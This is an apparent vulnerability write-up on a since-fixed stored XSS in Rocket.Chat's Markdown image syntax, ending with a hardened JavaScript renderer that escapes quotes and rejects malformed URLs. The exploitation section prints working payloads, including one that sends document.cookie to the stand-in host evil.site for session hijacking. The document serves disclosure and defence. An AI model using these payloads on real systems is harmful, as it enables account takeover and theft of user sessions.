Recently, we've observed a strange behavior of the chat service platform we're using for everyday communication – Rocket.Chat.

Rocket.Chat allows users to format their messages with Markdown syntax. Among the available options there is inline code syntax – `code`, which will produce the following message: … and image syntax – ![title](http://url.to.image), which will result in an image with the specified title as an attribute. However, combining those two together results in a very strange output message. It looked like some fault in the parser, so we couldn't wait to see if we could exploit it…

Exploitation

Let's take a closer look at the HTML rendered from the examples above:

<a href="http://bar" title="`foo`" target="_blank">

In the last example we can see weird things: `foo` was not parsed as code (it remains unchanged as the value of the title attribute), and the href attribute was for some reason converted to an HTML link, causing tag nesting. We know we can control the attribute name of … Unfortunately, we are restricted by a few constraints. After a couple of tests we knew the following: double quote (") and ampersand (&) characters are escaped to HTML entities (single quotes aren't).

Despite those limitations, we're still able to perform some nasty things. Let's try to create a JavaScript payload that will redirect the user to another location. We can use a single quote to put our string there and finish the whole line with … One last question is – how to trigger it? … onload attribute or any other event that would fire automatically. The best option we've found was triggering it with the onmouseover event and padding the message with random text so it would take as much space on the screen as possible.

![](http://onmouseover=window.location='http://evil.site'//)

Everything works as expected – after moving the mouse over the message we're redirected to http://evil.site.

Taking a closer look at the Rocket.Chat web application shows that the user's session is stored as two values: user id and login token. Both are available in local storage as well as in cookies that are not marked as HttpOnly. This makes it possible to create a payload for session hijacking:

![](http://onmouseover=window.location='http://evil.site?cookie='+document.cookie//)

This will send the necessary values to an attacker-controlled website. By replacing those values in cookies and local storage, we can take control over the victim's account.

We have an XSS that steals the user's session, but it's extremely noticeable – the redirection would instantly raise suspicions. Our next step is to make it harder to detect. It would be best if we could run external scripts, for example by simply adding … getElementById since calling a function requires a closing parenthesis. However, we can inspect the DOM tree via … After a short research we've found out that the last element of … innerHTML of the parent element and replace the original image with our own. If we could replace it with the same image and leak data via the URL, e.g. …, we'd be able to steal session data without any visible changes. The session-stealing JS payload will look like this: … This code will force the browser to load data from an external server with the given URL, thus sending the secret data to the attacker. The only noticeable side effect of this method could be a short blink when the new image is being loaded.

There's only one thing left – the space character between … Fortunately, there is a well-known trick to solve this issue – we can use a slash instead of a space. Now the attacker only needs to host the Rocket.Chat logo on his server to be able to steal user sessions in an inconspicuous way. To make it even harder to detect, we could add JavaScript code that clears the message using the method shown above.

The bug has been reported to Rocket.Chat's security team and has been fixed in release 0.58.0.
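The root cause described above is a renderer that inserts a user-supplied URL into an attribute with incomplete escaping (single quotes and backticks survive) and then linkifies the attribute value a second time. The following is an added example, not Rocket.Chat's code, of how a Markdown image renderer can close both holes: every attribute-breaking character is escaped (including the single quote the vulnerable parser left alone), the URL is rejected outright unless it is an absolute http(s) URL with a plain hostname, and the output is built exactly once with no further linkification. The regex, function names and the hostname rule are assumptions chosen for illustration; the payloads in the test are the ones from the post.

```javascript
// Added example (not Rocket.Chat's code): a hardened renderer for the
// Markdown image syntax ![title](url). All names here are assumptions.

const IMAGE_RE = /!\[([^\]]*)\]\(([^)\s]+)\)/g;

// Escape every character that can terminate an attribute or text node.
// The single quote and the backtick are included on purpose: the vulnerable
// parser in the post left them alone, which is what made the injection work.
function escapeHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#39;', '`': '&#96;',
  };
  return s.replace(/[&<>"'`]/g, (c) => map[c]);
}

// Accept only absolute http(s) URLs whose hostname is a plain DNS-style name.
// Anything else (javascript:, data:, or a "host" carrying =, ' or JS code, as
// in http://onmouseover=window.location='http://evil.site'//) is rejected
// rather than cleaned, so it never reaches an attribute.
function safeImageUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch (e) {
    return null;
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (!/^[a-z0-9.-]+$/i.test(u.hostname)) return null;
  return u.href; // normalized serialization, e.g. "http://bar/"
}

// Render image syntax into an <img>. Rejected URLs fall back to showing the
// literal (escaped) Markdown text, so a hostile message is visible as text
// and never becomes markup. The title is escaped too, so `foo` stays `foo`
// and is never re-parsed as inline code inside the attribute.
function renderImages(markdown) {
  return markdown.replace(IMAGE_RE, (whole, title, url) => {
    const href = safeImageUrl(url);
    if (href === null) return escapeHtml(whole);
    return `<img src="${escapeHtml(href)}" title="${escapeHtml(title)}">`;
  });
}

// Constructed sample messages: a benign image, the title/backtick corner case
// from the post, and the onmouseover payload from the post.
const SAMPLES = [
  '![logo](http://bar)',
  '![`foo`](http://bar)',
  "![](http://onmouseover=window.location='http://evil.site'//)",
];

for (const m of SAMPLES) {
  console.log(renderImages(m));
}
```

The design choice worth noting is "reject, don't repair": a URL that fails validation is rendered as escaped text instead of being trimmed into something that still ends up inside `src`, which is the step where the original parser's double processing went wrong.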